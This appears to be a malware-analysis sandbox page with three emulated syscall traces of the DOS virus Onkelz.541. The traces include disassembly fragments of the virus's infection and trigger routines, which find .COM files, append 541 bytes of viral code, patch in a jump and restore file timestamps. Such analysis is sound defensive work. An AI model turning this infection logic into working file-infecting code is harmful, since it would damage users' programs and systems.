Sample viewer

vx.netlux.org/Virus.DOS.Onkelz.541

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:07:37.581150462Z	26	PC: 1329e \| Set disk transfer address
2018-12-17T23:07:37.583600277Z	25	PC: 132ac \| Get default drive
2018-12-17T23:07:37.585230141Z	14	PC: 132b6 \| Set default drive (Drive = 'D')
2018-12-17T23:07:37.586768042Z	78	PC: 132c0 \| Find first file
2018-12-17T23:07:37.594575588Z	61	PC: 132cd \| Open file (Filename = 'SLEEP.COM')
2018-12-17T23:07:37.602009302Z	66	PC: 13397 \| Move file pointer
2018-12-17T23:07:37.603876282Z	62	PC: 132f4 \| Close file
2018-12-17T23:07:37.60613095Z	79	PC: 132c0 \| Find next file
2018-12-17T23:07:37.612517575Z	61	PC: 132cd \| Open file (Filename = 'PRINT.COM')
2018-12-17T23:07:37.619943574Z	66	PC: 13397 \| Move file pointer
2018-12-17T23:07:37.622553951Z	62	PC: 132f4 \| Close file
2018-12-17T23:07:37.627694905Z	79	PC: 132c0 \| Find next file
2018-12-17T23:07:37.630718448Z	61	PC: 132cd \| Open file (Filename = 'HELLO.COM')
2018-12-17T23:07:37.637886082Z	66	PC: 13397 \| Move file pointer
2018-12-17T23:07:37.64044925Z	62	PC: 132f4 \| Close file
2018-12-17T23:07:37.642687277Z	79	PC: 132c0 \| Find next file
2018-12-17T23:07:37.645686635Z	61	PC: 132cd \| Open file (Filename = 'PHANG.COM')
2018-12-17T23:07:37.663842233Z	66	PC: 13397 \| Move file pointer
2018-12-17T23:07:37.665411673Z	62	PC: 132f4 \| Close file
2018-12-17T23:07:37.667304682Z	79	PC: 132c0 \| Find next file
2018-12-17T23:07:37.672910098Z	61	PC: 132cd \| Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:07:37.681010114Z	66	PC: 13397 \| Move file pointer
2018-12-17T23:07:37.682823994Z	62	PC: 132f4 \| Close file
2018-12-17T23:07:37.685008561Z	79	PC: 132c0 \| Find next file
2018-12-17T23:07:37.689212533Z	61	PC: 132cd \| Open file (Filename = 'MANDEL.COM')
2018-12-17T23:07:37.69646701Z	66	PC: 13397 \| Move file pointer
2018-12-17T23:07:37.698263517Z	62	PC: 132f4 \| Close file
2018-12-17T23:07:37.701487387Z	79	PC: 132c0 \| Find next file
2018-12-17T23:07:37.70445257Z	61	PC: 132cd \| Open file (Filename = 'PAH.COM')
2018-12-17T23:07:37.711711064Z	66	PC: 13397 \| Move file pointer
2018-12-17T23:07:37.717942308Z	62	PC: 132f4 \| Close file
2018-12-17T23:07:37.72018299Z	79	PC: 132c0 \| Find next file
2018-12-17T23:07:37.723189562Z	61	PC: 132cd \| Open file (Filename = 'TEST.COM')
2018-12-17T23:07:37.732292483Z	66	PC: 13397 \| Move file pointer
2018-12-17T23:07:37.734298694Z	87	PC: 132e4 \| Get or set file date and time
2018-12-17T23:07:37.736287993Z	44	PC: 13304 \| Get time 0x13304: or dl, dl 0x13306: je 0x13300 0x13308: mov byte ptr [bp + 0x117], dl 0x1330c: mov ax, 0x4200 0x1330f: call 0x13391 0x13312: mov ah, 0x3f 0x13314: lea dx, word ptr [bp + 0x22d] 0x13318: mov cx, 3 0x1331b: int 0x21 0x1331d: mov ax, 0x4202 0x13320: call 0x13391 0x13323: sub ax, 3 0x13326: mov word ptr cs:[bp + 0x22b], ax 0x1332b: lea si, word ptr [bp + 0x106] 0x1332f: mov di, 0xfcbc 0x13332: mov cx, 0x21d 0x13335: cld 0x13336: rep movsb byte ptr es:[di], byte ptr [si] 0x13338: mov si, 0xfcdf 0x1333b: call 0x23287
2018-12-17T23:07:37.739389543Z	66	PC: 13397 \| Move file pointer
2018-12-17T23:07:37.749596922Z	63	PC: 1331d \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:07:37.752916622Z	66	PC: 13397 \| Move file pointer
2018-12-17T23:07:37.755478878Z	64	PC: 13348 \| Write file or device (Write 541 bytes on handle 5)
2018-12-17T23:07:37.775139996Z	66	PC: 13397 \| Move file pointer
2018-12-17T23:07:37.777264881Z	64	PC: 13359 \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:07:37.780987979Z	87	PC: 13360 \| Get or set file date and time
2018-12-17T23:07:37.784303962Z	62	PC: 13364 \| Close file
2018-12-17T23:07:37.793665049Z	42	PC: 13368 \| Get date 0x13368: cmp dh, dl 0x1336a: jne 0x1337d 0x1336c: mov ah, 0x2c 0x1336e: int 0x21 0x13370: and dh, 7 0x13373: jne 0x1337d 0x13375: mov ah, 9 0x13377: lea dx, word ptr [bp + 0x236] 0x1337b: int 0x21 0x1337d: mov ah, 0x1a 0x1337f: mov dx, 0x80 0x13382: int 0x21 0x13384: mov ah, 0xe 0x13386: mov dl, byte ptr [bp + 0x323] 0x1338a: int 0x21 0x1338c: mov ax, 0x100 0x1338f: push ax 0x13390: ret 0x13391: xor cx, cx 0x13393: xor dx, dx
2018-12-17T23:07:37.796527028Z	26	PC: 13384 \| Set disk transfer address
2018-12-17T23:07:37.81425865Z	14	PC: 1338c \| Set default drive (Drive = 'A')
2018-12-17T23:07:37.815871361Z	9	PC: 12a86 \| Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-17T23:07:37.822249601Z	48	PC: 12a8f \| Get DOS version
2018-12-17T23:07:37.824854627Z	61	PC: 12b5c \| Open file (Filename = '')
2018-12-17T23:07:37.832165941Z	93	PC: 12afe \| File sharing functions
2018-12-17T23:07:37.834279895Z	9	PC: 12a86 \| Display string (String= 'Size change=043Ah/01082d. ')
2018-12-17T23:07:37.839828615Z	76	PC: 12ae3 \| Terminate with return code (Return code = '1')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15933,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:44:54.215984209Z	26	PC: 1329e \| Set disk transfer address
2018-12-25T12:44:54.21829897Z	25	PC: 132ac \| Get default drive
2018-12-25T12:44:54.219296881Z	14	PC: 132b6 \| Set default drive (Drive = 'D')
2018-12-25T12:44:54.221115Z	78	PC: 132c0 \| Find first file
2018-12-25T12:44:54.22816865Z	61	PC: 132cd \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:54.234776163Z	66	PC: 13397 \| Move file pointer
2018-12-25T12:44:54.236346454Z	62	PC: 132f4 \| Close file
2018-12-25T12:44:54.238264986Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.241915145Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.248473077Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.250064954Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.252389145Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.255338386Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.261829558Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.264733622Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.266502553Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.268927921Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.281497193Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.283886022Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.286513764Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.298160642Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.305736089Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.308018408Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.310169285Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.313419862Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.320194778Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.322053551Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.324608117Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.327016074Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.3334386Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.335539525Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.337514354Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.340317348Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.357457111Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.359217914Z	87	PC: 132e4 \| Get or set file date and time
2018-12-25T12:44:54.360537194Z	44	PC: 13304 \| Get time 0x13304: or dl, dl 0x13306: je 0x13300 0x13308: mov byte ptr [bp + 0x117], dl 0x1330c: mov ax, 0x4200 0x1330f: call 0x13391 0x13312: mov ah, 0x3f 0x13314: lea dx, word ptr [bp + 0x22d] 0x13318: mov cx, 3 0x1331b: int 0x21 0x1331d: mov ax, 0x4202 0x13320: call 0x13391 0x13323: sub ax, 3 0x13326: mov word ptr cs:[bp + 0x22b], ax 0x1332b: lea si, word ptr [bp + 0x106] 0x1332f: mov di, 0xfcbc 0x13332: mov cx, 0x21d 0x13335: cld 0x13336: rep movsb byte ptr es:[di], byte ptr [si] 0x13338: mov si, 0xfcdf 0x1333b: call 0x23287
2018-12-25T12:44:54.363666334Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.364953581Z	63	PC: 1331d \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:54.371423251Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.374500328Z	64	PC: 13348 \| Write file or device (Write 541 bytes on handle 5)
2018-12-25T12:44:54.389900273Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.391255202Z	64	PC: 13359 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:54.394795849Z	87	PC: 13360 \| Get or set file date and time
2018-12-25T12:44:54.396510483Z	62	PC: 13364 \| Close file
2018-12-25T12:44:54.404243089Z	42	PC: 13368 \| Get date 0x13368: cmp dh, dl 0x1336a: jne 0x1337d 0x1336c: mov ah, 0x2c 0x1336e: int 0x21 0x13370: and dh, 7 0x13373: jne 0x1337d 0x13375: mov ah, 9 0x13377: lea dx, word ptr [bp + 0x236] 0x1337b: int 0x21 0x1337d: mov ah, 0x1a 0x1337f: mov dx, 0x80 0x13382: int 0x21 0x13384: mov ah, 0xe 0x13386: mov dl, byte ptr [bp + 0x323] 0x1338a: int 0x21 0x1338c: mov ax, 0x100 0x1338f: push ax 0x13390: ret 0x13391: xor cx, cx 0x13393: xor dx, dx
2018-12-25T12:44:54.407164619Z	26	PC: 13384 \| Set disk transfer address
2018-12-25T12:44:54.40848271Z	14	PC: 1338c \| Set default drive (Drive = 'A')
2018-12-25T12:44:54.41002894Z	9	PC: 12a86 \| Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:44:54.416263573Z	48	PC: 12a8f \| Get DOS version
2018-12-25T12:44:54.417596836Z	61	PC: 12b5c \| Open file (Filename = '')
2018-12-25T12:44:54.42438823Z	93	PC: 12afe \| File sharing functions
2018-12-25T12:44:54.427103001Z	9	PC: 12a86 \| Display string (See above)
2018-12-25T12:44:54.433659633Z	76	PC: 12ae3 \| Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15933,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:44:54.380699127Z	26	PC: 1329e \| Set disk transfer address
2018-12-25T12:44:54.388216186Z	25	PC: 132ac \| Get default drive
2018-12-25T12:44:54.389271431Z	14	PC: 132b6 \| Set default drive (Drive = 'D')
2018-12-25T12:44:54.390418023Z	78	PC: 132c0 \| Find first file
2018-12-25T12:44:54.403256021Z	61	PC: 132cd \| Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:54.42243468Z	66	PC: 13397 \| Move file pointer
2018-12-25T12:44:54.423861528Z	62	PC: 132f4 \| Close file
2018-12-25T12:44:54.431971062Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.434511913Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.440616816Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.442070146Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.444140945Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.446642388Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.45316941Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.455468893Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.457380193Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.460012003Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.467280526Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.468620099Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.470275334Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.473141249Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.491526555Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.493171046Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.495656797Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.498064415Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.50446635Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.506634797Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.510909319Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.513352746Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.52004592Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.521841631Z	62	PC: 132f4 \| Close file (See above)
2018-12-25T12:44:54.523793103Z	79	PC: 132c0 \| Find next file (See above)
2018-12-25T12:44:54.527017698Z	61	PC: 132cd \| Open file (See above)
2018-12-25T12:44:54.534202801Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.535893582Z	87	PC: 132e4 \| Get or set file date and time
2018-12-25T12:44:54.538267905Z	44	PC: 13304 \| Get time 0x13304: or dl, dl 0x13306: je 0x13300 0x13308: mov byte ptr [bp + 0x117], dl 0x1330c: mov ax, 0x4200 0x1330f: call 0x13391 0x13312: mov ah, 0x3f 0x13314: lea dx, word ptr [bp + 0x22d] 0x13318: mov cx, 3 0x1331b: int 0x21 0x1331d: mov ax, 0x4202 0x13320: call 0x13391 0x13323: sub ax, 3 0x13326: mov word ptr cs:[bp + 0x22b], ax 0x1332b: lea si, word ptr [bp + 0x106] 0x1332f: mov di, 0xfcbc 0x13332: mov cx, 0x21d 0x13335: cld 0x13336: rep movsb byte ptr es:[di], byte ptr [si] 0x13338: mov si, 0xfcdf 0x1333b: call 0x23287
2018-12-25T12:44:54.540951349Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.542615201Z	63	PC: 1331d \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:54.545412174Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.548152903Z	64	PC: 13348 \| Write file or device (Write 541 bytes on handle 5)
2018-12-25T12:44:54.56825742Z	66	PC: 13397 \| Move file pointer (See above)
2018-12-25T12:44:54.57024316Z	64	PC: 13359 \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:54.574123657Z	87	PC: 13360 \| Get or set file date and time
2018-12-25T12:44:54.575911999Z	62	PC: 13364 \| Close file
2018-12-25T12:44:54.589375382Z	42	PC: 13368 \| Get date 0x13368: cmp dh, dl 0x1336a: jne 0x1337d 0x1336c: mov ah, 0x2c 0x1336e: int 0x21 0x13370: and dh, 7 0x13373: jne 0x1337d 0x13375: mov ah, 9 0x13377: lea dx, word ptr [bp + 0x236] 0x1337b: int 0x21 0x1337d: mov ah, 0x1a 0x1337f: mov dx, 0x80 0x13382: int 0x21 0x13384: mov ah, 0xe 0x13386: mov dl, byte ptr [bp + 0x323] 0x1338a: int 0x21 0x1338c: mov ax, 0x100 0x1338f: push ax 0x13390: ret 0x13391: xor cx, cx 0x13393: xor dx, dx
2018-12-25T12:44:54.592482279Z	44	PC: 13370 \| Get time 0x13370: and dh, 7 0x13373: jne 0x1337d 0x13375: mov ah, 9 0x13377: lea dx, word ptr [bp + 0x236] 0x1337b: int 0x21 0x1337d: mov ah, 0x1a 0x1337f: mov dx, 0x80 0x13382: int 0x21 0x13384: mov ah, 0xe 0x13386: mov dl, byte ptr [bp + 0x323] 0x1338a: int 0x21 0x1338c: mov ax, 0x100 0x1338f: push ax 0x13390: ret 0x13391: xor cx, cx 0x13393: xor dx, dx 0x13395: int 0x21 0x13397: ret 0x13398: jmp 0x13de9 0x1339b: jmp 0x13bcf
2018-12-25T12:44:54.594966851Z	26	PC: 13384 \| Set disk transfer address
2018-12-25T12:44:54.596461609Z	14	PC: 1338c \| Set default drive (Drive = 'A')
2018-12-25T12:44:54.598560011Z	9	PC: 12a86 \| Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:44:54.604301502Z	48	PC: 12a8f \| Get DOS version
2018-12-25T12:44:54.605966166Z	61	PC: 12b5c \| Open file (Filename = '')
2018-12-25T12:44:54.613637999Z	93	PC: 12afe \| File sharing functions
2018-12-25T12:44:54.615892948Z	9	PC: 12a86 \| Display string (See above)
2018-12-25T12:44:54.621678309Z	76	PC: 12ae3 \| Terminate with return code (Return code = '1')